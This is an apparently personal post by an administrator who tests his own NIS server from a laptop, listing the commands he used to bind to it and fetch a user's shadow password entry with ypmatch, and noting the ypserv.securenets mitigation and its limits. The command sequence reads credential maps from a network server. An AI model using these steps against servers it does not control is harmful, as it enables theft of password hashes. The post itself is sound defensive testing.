I tested hacking NIS from my laptop
$ sudo apt-get install nis
$ sudo vi yp.conf
add "ypdomain 192.168.20.1" (AKA the NIS server's IP Address)
$ sudo vi defaultdomain
(I knew I had limited access to the NIS server to just the subnet, so I made sure to be on the same network)
$ sudo ypbind -d
parsing config file
Trying entry: ypserver 192.168.20.1
parsed ypserver 192.168.20.1
add_server() domain: nisdomain, host: 18.104.22.168, nobroadcast, slot: 0
[Welcome to ypbind-mt, version 1.8]
ping host '192.168.20.1', domain 'nisdomain'
Answer for domain 'nisdomain' from server '192.168.20.1'
Pinging all active server.
$ ypmatch diane shadow
Can't match key diane in map shadow. Reason: No such map in server's domain
$ ypmatch diane passwd.byname
$ sudo ypmatch diane shadow.byname
Needless to say, the crypted password is a bogus string and the domain name and IP addresses have been changed to protect the innocent.
Though one coworker did suggest a solution, explicitly put the IP addresses of all the machines that should have access in the ypserv.securenets file.
That did work, though if an "evildoer" can steal one of my IP addresses they can still get the crypted passwords.